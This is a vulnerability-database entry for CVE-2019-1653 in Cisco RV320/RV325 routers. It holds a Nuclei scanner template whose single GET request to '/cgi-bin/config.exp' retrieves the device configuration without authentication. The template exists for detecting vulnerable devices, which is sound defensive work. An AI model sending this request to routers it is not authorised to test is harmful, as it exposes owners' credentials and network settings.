Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-1653
HistoryOct 01, 2020 - 7:17 a.m.

Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure

2020-10-0107:17:09
ProjectDiscovery
github.com
9

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

6.5 Medium

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.976 High

EPSS

Percentile

100.0%

Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated remote attacker to retrieve sensitive information due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information.
id: CVE-2019-1653

info:
  name: Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure
  author: dwisiswant0
  severity: high
  description: |
    Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated remote attacker to retrieve sensitive information due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.
  remediation: |
    Cisco has released firmware updates that address this vulnerability.
  reference:
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
    - https://www.exploit-db.com/exploits/46262/
    - https://www.exploit-db.com/exploits/46655/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-1653
    - http://packetstormsecurity.com/files/152305/Cisco-RV320-RV325-Unauthenticated-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-1653
    cwe-id: CWE-200,CWE-284
    epss-score: 0.97565
    epss-percentile: 0.99999
    cpe: cpe:2.3:o:cisco:rv320_firmware:1.4.2.15:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: cisco
    product: rv320_firmware
  tags: cve,cve2019,packetstorm,kev,edb,cisco,router,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/config.exp"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "sysconfig"

      - type: status
        status:
          - 200
# digest: 490a00463044022063c08accaf37753f5fab51f0ef102167a4537497ab583445014180310ae3f74102202b4a88b5d62c16b6c6288ea140c56202bcf783658b07d7b7a6b83db626ccb971:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

6.5 Medium

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.976 High

EPSS

Percentile

100.0%